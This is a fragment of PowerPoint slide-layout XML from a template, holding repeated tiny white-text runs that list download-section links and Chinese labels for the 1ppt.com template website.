              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout143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43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43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43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4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44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44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44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44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44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44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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout144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44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44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44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4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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout145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45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45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45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45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45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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
